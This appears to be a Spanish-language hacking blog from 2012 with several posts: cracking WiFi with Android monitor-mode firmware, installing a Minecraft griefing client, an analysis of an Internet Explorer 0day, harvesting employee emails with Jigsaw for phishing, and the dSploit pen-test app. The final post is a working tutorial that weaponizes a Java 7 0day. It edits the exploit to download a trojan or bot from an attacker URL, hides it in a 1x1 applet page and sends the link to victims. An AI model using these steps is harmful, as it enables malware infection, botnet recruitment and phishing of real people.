Social Icons

Featured Posts

viernes, 16 de noviembre de 2012

Crackear redes Wifi con tu android(En modo Monitor)



Seguramente a muchos les paso por la cabeza la idea de crackear redes wifi con su smartphone, pero para nuestra mala suerte no se podía  por que sorprendentemente el modo monitor(modo para snifear el trafico Wifi) no se puede encontrar en cualquier dispositivo android(por no decir todos), ya que el chipset que se utiliza en los dispositivo android que mayormente son realizadas por Broadcom no añadieron el soporte para el modo monitor.

Pero un grupo de investigadores decidieron pasar sus vacaciones viendo la forma de añadir el modo monitor a sus android(Nexus One y Galaxy S II), en un primer momento compilaron el controlador en modo depuración, y se dieron cuenta que el modulo elimina los encabezados 801.11 en Hw, con la cual concluyeron que se necesita hacer un cambio de firmware en sus dispositivos android, así que empezaron hacerle ingeniería inversa al firmware y después de unas semanas obtuvieron una compresión decente de la recepción de paquetes en el proceso, con lo cual sacaron su 1er firmware con el modo monitor añadido.

Actualmente tienen un firmware parchado para los siguientes chipset:


Si disponemos uno de los modelos de android descritos anteriormente, es mas probable que funcione esos firmware, pero las pruebas han sido hechas con la ROM Cyanogen 7 y Cyanogen 9, que son unas rom personalizadas y que ha tenido una aceptable aprobación entre las personas que usan dispositivos android por su estabilidad.

Instalación del firmware:

 Ser usuarios "root" en nuestro android.
 (Opcional) Tener la rom Cyanogen en nuestro android.
 Descargar el firmware para Android Nexus One ó para Android Galaxy S II
 Extraer el Archivo .zip en su dispositivo android (por ejemplo en su sdcard)
 Ejecutar 'sh setup.sh' en un terminal(como adb ssh, SManager, etc)
 Ahora debemos tener una interfaz eth0(Nexus One) ó wlan0(Galaxy S II) en modo monitor.
 Ahora ejecutar '' ó '' y obtendremos un resultado como esto:

eth0      IEEE 802.11-DS  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.412 GHz  Access Point: Not-Associated
          Bit Rate:72 Mb/s   Tx-Power:32 dBm
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Managementmode:All packets received
          Link Quality=5/5  Signal level=0 dBm  Noise level=-92 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Y para la instalación del firmware en otros dispositivos android:

 Dar un vistazo el código fuente http://code.google.com/p/bcmon/source/checkout
 Desarrollar el archivo .ko para nuestro dispositivo(en la wiki Cyanogen nos debería ayudar)
 Seguir los pasos de instalación para Nexus One ó Galaxy S II

Los archivos binarios de AirCrack

 aircrack-ng suite
 tcpdump
 iwconfig
 aircrack-static(para poder utilizar comandos como ''

Descargarlo de http://bcmon.googlecode.com/svn/trunk/bundles/utils.zip

AeroDump en ejecución en Nexus One
Eso es todo, y a probar, eso si, no me responsabilizo por los daños ó fallos que le puedan ocurrir a sus dispositivos android, hagan lo bajo su responsabilidad.

Para mayor información http://bcmon.blogspot.com/

jueves, 8 de noviembre de 2012

Minecraft Griefing !!!

Hey guys, this is my simple guide for the new people on how to install a griefing client in 4 steps 


Also feel free to suggest more tutorials i should make, i will gladly try my best at them :)


Step one
Make sure you have a client on your desktop

[Image: yH5gI.png]

Step two
Go to your C:\Users\*Your User Name*\AppData\Roaming\.minecraft (go into run and type %Appdata% , there will be a picture on how to un hide your App data folder ) and go into .minecraft/bin and replace your griefing client with your minecraft.jar

[Image: hJxUV.png]

Step three
Run Minecraft???..PROFIT!!

[Image: ucZq4.png]

How to un hide AppData
Go to Run and type in %appdata%, click on top to go to AppData, and simply right click and click hidden, so the check in the box goes the box

[Image: nMX1x.png]


Please note, i am using my teams client in this, but you can download free clients from this blog


Griefing Packs: http://www.mediafire.com/?u9amxjpcrfpvp41

Minecraft: https://s3.amazonaws.com/MinecraftDownload/launcher/Minecraft.exe

sábado, 13 de octubre de 2012

Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7





Un investigador de seguridad ha encontrado una nueva Vulnerabilidad 0day que afecta a Internet Explorer, mientras se realizaba un análisis de una página de malware que se estaba utilizando para explotar las vulnerabilidades de Java.

Según el equipo de Metasploit, el Internet Explorer 7, 8 y 9 en Windows XP, Vista y 7 son vulnerables a este ataque.

Eric Romang ha descubierto una carpeta "/public/help" en uno de los servidores infectados. Él encontró un archivo flash (.Swf), dos paginas html (protect.html, exploit.html) y el archivo exe.


Al abrir la página exploit.html, carga el archivo flash, que a su vez carga la otra página HTML (protect.html). Juntos, ayudan a bajar el archivo ejecutable en la computadora de la víctima.

El equipo de Metasploit inmediatamente ha desarrollado el módulo para este exploit. Según los investigadores de Metasploit, el exploit, que ya había sido utilizado por los atacantes maliciosos en la naturaleza antes de que fuera publicado en Metasploit, afecta a alrededor del 41% de los usuarios de Internet en América del Norte y el 32% a nivel mundial.

Desde que Microsoft no ha lanzado un parche para esta vulnerabilidad, sin embargo, se aconseja a  los usuarios de IE cambiar a otro navegador hasta que una actualización de seguridad disponible.


exploit.html
Este archivo se reconoce como un archivo HTML, y  por 0 anti-virus en VirusTotal

"exploit.html" es el punto de partida del ataque. Este archivo se crea una matriz de "img" y carga  el archivo Flash "Moh2010.swf" 



Moh2010.swf
Este archivo es reconocida como una película de Macromedia Flash Player, y por 0 anti-virus en VirusTotal

Se puede observar que el archivo está lleno de DosSWF que se descomprimira en la memoria. Después de la descompresión "Moh2010.swf" el archivo se derrama en el montón y eval un iframe al archivo "Protect.html".


El código ActionScript incrustado en el original lleno de archivos SWF, también es interesante, podrás ver algunos de codificación especial (chino?).

Este archivo, que durante la explotación es también comprobar si el sitio web está en Flash Website Storage Settings pannel para nada más cargar el archivo "Protect.html". Esto significa, que una vez infectado el usuario ya no será explotado a pesar de nuevas visitas a la página web.

Muestra en la primera visita:
Muestra de la explotación exitosa:



Muestra en otras visitas:



Protect.html
Este archivo se reconoce como un archivo HTML, y  por 0 anti-virus en VirusTotal

Si usted echa un vistazo al código fuente, se puede ver el código javascript interesante, como es la manipulación de la "img" matriz creada por "exploit.html".

También verá que las pruebas se hacen, con destino a Windows XP 32-bit e Internet Explorer 7 u 8.



111.exe
Este archivo se reconoce como un archivo de imagen Autodesk FLIC, y por 0 anti-virus en VirusTotal

El archivo se ha enviado a Malware Tracker (baabd0b871095138269cf2c53b517927), este archivo se ve sospechoso y requiere mas investigaciones.


Si deseamos tener el modulo para explotar esta vulnerabilidad desde el Metasploit, es necesario actualizar la misma desde el siguiente link: https://community.rapid7.com/docs/DOC-1975

La captura de pantalla siguiente se muestra un ataque exitoso contra una máquina de Windows 7 con Internet Explorer 9 instalado:



Está es en contra de Internet Explorer 8 instalado:



He aquí otro ejemplo de la explotación en un Windows XP SP3 box, totalmente parcheado:


El exploit también trabaja en contra de Windows Vista.

Fuentes de Información:



Enumeración de Email e Informacion con JIGSAW




Jigsaw es una herramienta basada en Ruby que nos permite enumerar la informacion (E-mail, Direccion, Nombre y Apellidos y Cargos) de las personas que laboran en una empresa ya sea en Facebook, Google, Microsoft u otros.

Mayormente esta informacion puede servir para realizar Ing. Social o E-mail Pishing. 



UBICACIÓN:

  • Aplicaciones - BackTrack - Information Gathering - Network Analysis - OSINT Analysis - jigsaw




MODOS DE USO:


  • En este caso obtendré información de Facebook, para ello usare el comando: ./jigsaw.rb -s Facebook


  • He obtenido algunos ID mostrando el nombre de la entidad a la que corresponde, entonces colocare el comando incluyendo el numero de ID de la entidad que queremos obtener información  ejemplo: ./jigsaw.rb -i 234590 


  • Como vemos, el ID que he colocado ha arrojado 2 dominios, por lo tanto nos muestra un mensaje indicando que coloquemos el dominio de la cual queremos obtener información, en este caso colocarefacebook.com


  • La información que se obtuvo fue de 479 records en la cual incluye Nombres y Apellidos, Cargos, E-mail y Dirección Domiciliaria.

Ahora, si queremos guardar la información obtenida y luego visualizarla nuevamente, simplemente colocaremos los siguientes comandos:

  • ./jigsaw.rb -i 234590 -r facebook
  • facebook.com
  • ls
  • cat facebook.csv



VIDEO-TUTORIAL:


DESCARGAR JIGSAW:

dSploit – Suite de Pen-testing en Android









INTRODUCCIÓN:

Simone Margaritelli (alias Evilsocket) recientemente público dSploit, un nuevo proyecto dedicado al mundo Android con la capacidad de realizar análisis y pruebas de penetraciones de red que llevan a un dispositivo móvil y a un profesional avanzado realizar una evaluación de la seguridad de IT.

Una vez que la aplicación se inicia, el usuario será capaz de mapear su red, identificar los sistemas operativos y servicios que se ejecutan en otros parámetros, realizar búsqueda de vulnerabilidades conocidas, descifrar los procedimientos de acceso de los métodos más comunes de autenticación, realizar ataques man in the middle y por lo tanto tiene el control total del tráfico de red, tanto pasiva con un sniffer contraseña y disector de los protocolos más comunes que la manipulación activa de paquetes en tiempo real desde y hacia otras máquinas en nuestro propia red, etc.



REQUISITOS:

  • Un dispositivo Android con la version 3.0 o superior.
  • El dispositivo debe estar rooteado.
  • El dispositivo debe tener una instalación BusyBox completo, esto significa con cada utilidad instalada (no la instalación parcial).



Actualmente dSploit esta en versión beta la cual se distribuye a través del circuito GitHub por lo que se puede encontrar el archivo APK para instalar directamente en su dispositivo!


CAPTURA:





INFORMACIÓN - DESCARGA:

Explotando Java7 0day - Exploit .JAR


Explotando Java7 0day - Exploit .JAR by CalebBucker


Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

Empecemos.

Descargamos el Exploit:
Pass: calebbucker

Necesitaremos el Programa Eclipse:
Disponible 32 y 64 bits, descargue dependiendo de su S.O

Instalamos JAVA 7: http://java.softonic.com/

Iniciamos Eclipse, seleccionamos File - Import:


Seleccionamos General - Proyectos Existentes en el Área de Trabajo:


Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es C:\Documents and Settings\TioSam\Escritorio\exploit2


Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo Gondvv.java y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("http://www.sitio-web.com/file.exe");




Ahora, abrimos el archivo applet1.java y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.



Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:


El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:


Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es: C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar


Terminado ese paso le damos Next, Next y Finish.

Ahora, creamos un archivo html con el siguiente código:

<html><head></head><body><applet archive="JARNOMBRE.jar" code="applet1.class" width="1" height="1"></applet></body></html>


En mi caso el codigo queda de la siguiente manera:

<html><head></head><body><applet archive="test.jar" code="applet1.class" width="1" height="1"></applet></body></html>



Esos archivos la subimos en nuestro Host, de preferencia de pago.

Ahora solo queda enviar el link: www.sitio-web.com/index.html a cualquier persona.

En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado 




Esta vulnerabilidad también puede ser explotada desde Metasploit:

Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.

Saludos.

Autor: CalebBucker